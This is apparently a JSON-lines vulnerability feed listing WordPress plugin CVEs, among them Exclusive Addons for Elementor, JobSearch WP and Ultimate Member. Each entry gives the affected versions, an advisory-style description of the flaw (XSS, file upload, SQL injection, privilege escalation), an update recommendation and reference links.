{"CVE_ID":"CVE-2024-2751","slug":"exclusive-addons-for-elementor","versionImpact":"2.6.9.2","versionEndExcluding":"2.6.9.3","description":"The Exclusive Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018exad_infobox_animating_mask_style\u2019 parameter in all versions up to, and including, 2.6.9.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.6.9.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e9ad2dff-0c6d-4d91-a35d-803b97def01f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e9ad2dff-0c6d-4d91-a35d-803b97def01f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3065677%40exclusive-addons-for-elementor%2Ftrunk&old=3051927%40exclusive-addons-for-elementor%2Ftrunk&sfp_email=&sfph_mail=#file51\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3065677%40exclusive-addons-for-elementor%2Ftrunk&old=3051927%40exclusive-addons-for-elementor%2Ftrunk&sfp_email=&sfph_mail=#file51\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2503","slug":"exclusive-addons-for-elementor","versionImpact":"2.6.9.2","versionEndExcluding":"2.6.9.3","description":"The Exclusive Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Post Grid Widget in all versions up to, and including, 2.6.9.2 due to insufficient input sanitization and output escaping on user supplied tags. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. CVE-2024-32557 is likely a duplicate of this issue.","recommendation":"Update to version 2.6.9.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2bd53172-ddfa-481a-818d-626b9db6fe41?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2bd53172-ddfa-481a-818d-626b9db6fe41?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/exclusive-addons-for-elementor\\\/tags\\\/2.6.9.1\\\/includes\\\/template-parts\\\/tmpl-post-grid.php#L103\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/exclusive-addons-for-elementor\\\/tags\\\/2.6.9.1\\\/includes\\\/template-parts\\\/tmpl-post-grid.php#L103\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3065677%40exclusive-addons-for-elementor%2Ftrunk&old=3051927%40exclusive-addons-for-elementor%2Ftrunk&sfp_email=&sfph_mail=#file51\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3065677%40exclusive-addons-for-elementor%2Ftrunk&old=3051927%40exclusive-addons-for-elementor%2Ftrunk&sfp_email=&sfph_mail=#file51\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2028","slug":"exclusive-addons-for-elementor","versionImpact":"2.6.9","versionEndExcluding":"2.6.9.1","description":"The Exclusive Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Covid-19 Stats Widget in all versions up to, and including, 2.6.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.6.9.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d44ecf8a-d19a-403a-96c7-89e223a5cc22?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d44ecf8a-d19a-403a-96c7-89e223a5cc22?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3042217\\\/exclusive-addons-for-elementor\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3042217\\\/exclusive-addons-for-elementor\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0173","slug":"wpfunnels","versionEndExcluding":"2.6.9","description":"The Drag & Drop Sales Funnel Builder for WordPress plugin before 2.6.9 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c543b6e2-a7c0-4ba7-a308-e9951dd59fb9\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c543b6e2-a7c0-4ba7-a308-e9951dd59fb9\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0824","slug":"exclusive-addons-for-elementor","versionImpact":"2.6.8","versionEndExcluding":"2.6.9","description":"The Exclusive Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Link Anything functionality in all versions up to, and including, 2.6.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.6.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/925b0a86-ed23-471c-84e2-ae78a01b1876?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/925b0a86-ed23-471c-84e2-ae78a01b1876?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3026499\\\/exclusive-addons-for-elementor\\\/trunk\\\/extensions\\\/link-anything.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3026499\\\/exclusive-addons-for-elementor\\\/trunk\\\/extensions\\\/link-anything.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0823","slug":"exclusive-addons-for-elementor","versionImpact":"2.6.8","versionEndExcluding":"2.6.9","description":"The Exclusive Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Link To' url in carousels in all versions up to, and including, 2.6.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.6.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2c5cdc3f-eaa6-4d0b-9e75-5483c723e15a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2c5cdc3f-eaa6-4d0b-9e75-5483c723e15a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3026499\\\/exclusive-addons-for-elementor\\\/trunk\\\/elements\\\/logo-carousel\\\/logo-carousel.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3026499\\\/exclusive-addons-for-elementor\\\/trunk\\\/elements\\\/logo-carousel\\\/logo-carousel.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4002","slug":"wp-carousel-free","versionImpact":"2.6.8","versionEndExcluding":"2.6.9","description":"The Carousel, Slider, Gallery by WP Carousel WordPress plugin before 2.6.9 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 2.6.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/298b51ec-afad-4bc1-968d-76c59e55fc05\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/298b51ec-afad-4bc1-968d-76c59e55fc05\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7019","slug":"wp-maintenance-mode","versionImpact":"2.6.8","versionEndExcluding":"2.6.9","description":"The LightStart \u2013 Maintenance Mode, Coming Soon and Landing Page Builder plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the insert_template function in all versions up to, and including, 2.6.8. This makes it possible for authenticated attackers, with subscriber-level access and above, to change page designs.","recommendation":"Update to version 2.6.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b57d3d1d-dcdb-4f11-82d8-183778baa075?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b57d3d1d-dcdb-4f11-82d8-183778baa075?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3013229\\\/wp-maintenance-mode\\\/trunk\\\/includes\\\/classes\\\/wp-maintenance-mode-admin.php?contextall=1&old=2922691&old_path=%2Fwp-maintenance-mode%2Ftrunk%2Fincludes%2Fclasses%2Fwp-maintenance-mode-admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3013229\\\/wp-maintenance-mode\\\/trunk\\\/includes\\\/classes\\\/wp-maintenance-mode-admin.php?contextall=1&old=2922691&old_path=%2Fwp-maintenance-mode%2Ftrunk%2Fincludes%2Fclasses%2Fwp-maintenance-mode-admin.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7203","slug":"smart-forms","versionImpact":"2.6.86","versionEndExcluding":"2.6.87","description":"The Smart Forms WordPress plugin before 2.6.87 does not have authorisation in various AJAX actions, which could allow users with a role as low as subscriber to call them and perform unauthorised actions such as deleting entries. The plugin also lacks CSRF checks in some places which could allow attackers to make logged in users perform unwanted actions via CSRF attacks such as deleting entries.","recommendation":"Update to version 2.6.87, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b514b631-c3e3-4793-ab5d-35ed0c38b011\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b514b631-c3e3-4793-ab5d-35ed0c38b011\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4389","slug":"crawlomatic-multipage-scraper-post-generator","versionImpact":"2.6.8.1","versionEndExcluding":"2.6.8.2","description":"The Crawlomatic Multipage Scraper Post Generator plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the crawlomatic_generate_featured_image() function in all versions up to, and including, 2.6.8.1. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 2.6.8.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/crawlomatic-multisite-scraper-post-generator-plugin-for-wordpress\\\/20476010\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/crawlomatic-multisite-scraper-post-generator-plugin-for-wordpress\\\/20476010\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1283e839-8588-4a76-9c1e-61562526166d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1283e839-8588-4a76-9c1e-61562526166d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8615","slug":"wp-jobsearch","versionImpact":"2.6.7","versionEndExcluding":"2.6.8","description":"The JobSearch WP Job Board plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the jobsearch_location_load_excel_file_callback() function in all versions up to, and including, 2.6.7. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 2.6.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dd718d44-4921-4deb-af5a-43e5f3926914?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dd718d44-4921-4deb-af5a-43e5f3926914?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/jobsearch-wp-job-board-wordpress-plugin\\\/21066856\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/jobsearch-wp-job-board-wordpress-plugin\\\/21066856\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8614","slug":"wp-jobsearch","versionImpact":"2.6.7","versionEndExcluding":"2.6.8","description":"The JobSearch WP Job Board plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the jobsearch_wp_handle_upload() function in all versions up to, and including, 2.6.7. This makes it possible for authenticated attackers, with subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 2.6.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7832f8fe-2b41-4cfb-a734-db4ec88d91a3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7832f8fe-2b41-4cfb-a734-db4ec88d91a3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/jobsearch-wp-job-board-wordpress-plugin\\\/21066856\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/jobsearch-wp-job-board-wordpress-plugin\\\/21066856\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11925","slug":"wp-jobsearch","versionImpact":"2.6.7","versionEndExcluding":"2.6.8","description":"The JobSearch WP Job Board plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 2.6.7. This is due to the plugin not properly verifying a user's identity when verifying an email address through the user_account_activation function. This makes it possible for unauthenticated attackers to log in as any user, including site administrators, if the user's email is known.","recommendation":"Update to version 2.6.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/jobsearch-wp-job-board-wordpress-plugin\\\/21066856\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/jobsearch-wp-job-board-wordpress-plugin\\\/21066856\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/04bc8101-2676-4695-a498-f79be8221617?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/04bc8101-2676-4695-a498-f79be8221617?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2015-10111","slug":"watu","versionImpact":"2.6.7","versionEndExcluding":"2.6.8","description":"A vulnerability was found in Watu Quiz Plugin up to 2.6.7 on WordPress. It has been rated as critical. This issue affects the function watu_exams of the file controllers\/exam.php of the component Exam Handler. The manipulation of the argument quiz leads to sql injection. The attack may be initiated remotely. Upgrading to version 2.6.8 is able to address this issue. The name of the patch is bf42e7cfd819a3e76cf3e1465697e89f4830590c. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-230651.","recommendation":"Update to version 2.6.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/watu\\\/commit\\\/bf42e7cfd819a3e76cf3e1465697e89f4830590c\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/watu\\\/commit\\\/bf42e7cfd819a3e76cf3e1465697e89f4830590c\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.230651\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.230651\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?id.230651\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?id.230651\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2643","slug":"UNKNOWN-CVE-2023-5509-1","versionImpact":"2.6.7","versionEndExcluding":"2.6.8","description":"The Floating Notification Bar, Sticky Menu on Scroll, Announcement Banner, and Sticky Header for Any WordPress plugin before 2.6.8 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 2.6.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/194ebf81-8fe4-4c74-8174-35d0ac00ac93\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/194ebf81-8fe4-4c74-8174-35d0ac00ac93\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3460","slug":"ultimate-member","versionEndExcluding":"2.6.7","description":"The Ultimate Member WordPress plugin before 2.6.7 does not prevent visitors from creating user accounts with arbitrary capabilities, effectively allowing attackers to create administrator accounts at will. This is actively being exploited in the wild.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/694235c7-4469-4ffd-a722-9225b19e98d7\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/694235c7-4469-4ffd-a722-9225b19e98d7\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.wpscan.com\\\/hacking-campaign-actively-exploiting-ultimate-member-plugin\\\/\",\"name\":\"https:\\\/\\\/blog.wpscan.com\\\/hacking-campaign-actively-exploiting-ultimate-member-plugin\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0437","slug":"password-protected","versionImpact":"2.6.6","versionEndExcluding":"2.6.7","description":"The Password Protected \u2013 Ultimate Plugin to Password Protect Your WordPress Content with Ease plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.6.6 via the API. This makes it possible for authenticated attackers, with subscriber access or higher, to extract post titles and content, thus bypassing the plugin's password protection.","recommendation":"Update to version 2.6.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f3045ebf-70af-4124-9116-42c07f64a3bf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f3045ebf-70af-4124-9116-42c07f64a3bf?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3034934%40password-protected%2Ftrunk&old=3005632%40password-protected%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3034934%40password-protected%2Ftrunk&old=3005632%40password-protected%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1857","slug":"woo-gift-cards-lite","versionImpact":"2.6.6","versionEndExcluding":"2.6.7","description":"The Ultimate Gift Cards for WooCommerce \u2013 Create, Redeem & Manage Digital Gift Certificates with Personalized Templates plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.6.6 via the wps_wgm_preview_email_template(). This makes it possible for unauthenticated attackers to read password protected and draft posts that may contain sensitive data.","recommendation":"Update to version 2.6.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2b0d0c44-0ee8-400b-a4ea-e5520c2a6710?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2b0d0c44-0ee8-400b-a4ea-e5520c2a6710?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3046745%40woo-gift-cards-lite&new=3046745%40woo-gift-cards-lite&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3046745%40woo-gift-cards-lite&new=3046745%40woo-gift-cards-lite&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10936","slug":"string-locator","versionImpact":"2.6.6","versionEndExcluding":"2.6.7","description":"The String locator plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 2.6.6 via deserialization of untrusted input in the 'recursive_unserialize_replace' function. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. An administrator must perform a search and replace action to trigger the exploit.","recommendation":"Update to version 2.6.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/string-locator\\\/trunk\\\/includes\\\/Extension\\\/SearchReplace\\\/Replace\\\/class-sql.php#L170\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/string-locator\\\/trunk\\\/includes\\\/Extension\\\/SearchReplace\\\/Replace\\\/class-sql.php#L170\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3222952\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3222952\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1404f034-2d1d-44b2-87e5-61f72f215417?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1404f034-2d1d-44b2-87e5-61f72f215417?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7048","slug":"mystickymenu","versionImpact":"2.6.6","versionEndExcluding":"2.6.7","description":"The My Sticky Bar plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.6.6. This is due to missing or incorrect nonce validation in mystickymenu-contact-leads.php. This makes it possible for unauthenticated attackers to trigger the export of a CSV file containing contact leads via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. Because the CSV file is exported to a public location, it can be downloaded during a very short window of time before it is automatically deleted by the export function.","recommendation":"Update to version 2.6.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be0ab40f-cff7-48bd-8dae-cc50af047151?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be0ab40f-cff7-48bd-8dae-cc50af047151?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3016780\\\/mystickymenu\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3016780\\\/mystickymenu\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3068","slug":"custom-field-suite","versionImpact":"2.6.5","versionEndExcluding":"2.6.6","description":"The Custom Field Suite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'cfs[fields][*][name]' parameter in all versions up to, and including, 2.6.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 2.6.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0ab546cc-b099-4d26-bf42-785952fcfd8c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0ab546cc-b099-4d26-bf42-785952fcfd8c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-field-suite\\\/trunk\\\/templates\\\/field_html.php?order=date&desc=1#L46\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-field-suite\\\/trunk\\\/templates\\\/field_html.php?order=date&desc=1#L46\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3080330%40custom-field-suite%2Ftrunk&old=3042177%40custom-field-suite%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3080330%40custom-field-suite%2Ftrunk&old=3042177%40custom-field-suite%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8910","slug":"ht-mega-for-elementor","versionImpact":"2.6.5","versionEndExcluding":"2.6.6","description":"The HT Mega \u2013 Absolute Addons For Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.6.5 via the render function in includes\/widgets\/htmega_accordion.php. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft template data.","recommendation":"Update to version 2.6.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/09fb88e4-4846-40d3-8a79-a6a867bfb59f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/09fb88e4-4846-40d3-8a79-a6a867bfb59f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3156058\\\/ht-mega-for-elementor\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3156058\\\/ht-mega-for-elementor\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13100","slug":"woo-ups-pickup","versionImpact":"2.6.5","versionEndExcluding":"2.6.6","description":"The OPSI Israel Domestic Shipments WordPress plugin through 2.6.3 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"Update to version 2.6.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b9261010-ab55-4d18-8fd2-2003f8692ae8\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b9261010-ab55-4d18-8fd2-2003f8692ae8\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0709","slug":"cryptocurrency-price-ticker-widget","versionImpact":"2.6.5","versionEndExcluding":"2.6.6","description":"The Cryptocurrency Widgets \u2013 Price Ticker & Coins List plugin for WordPress is vulnerable to SQL Injection via the 'coinslist' parameter in versions 2.0 to 2.6.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.6.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b0603621-4521-4eb0-b4dd-e2257c133cee?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b0603621-4521-4eb0-b4dd-e2257c133cee?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cryptocurrency-price-ticker-widget\\\/trunk\\\/includes\\\/ccpw-db-helper.php?rev=3003658#L172\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cryptocurrency-price-ticker-widget\\\/trunk\\\/includes\\\/ccpw-db-helper.php?rev=3003658#L172\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3024040%40cryptocurrency-price-ticker-widget&new=3024040%40cryptocurrency-price-ticker-widget&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3024040%40cryptocurrency-price-ticker-widget&new=3024040%40cryptocurrency-price-ticker-widget&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
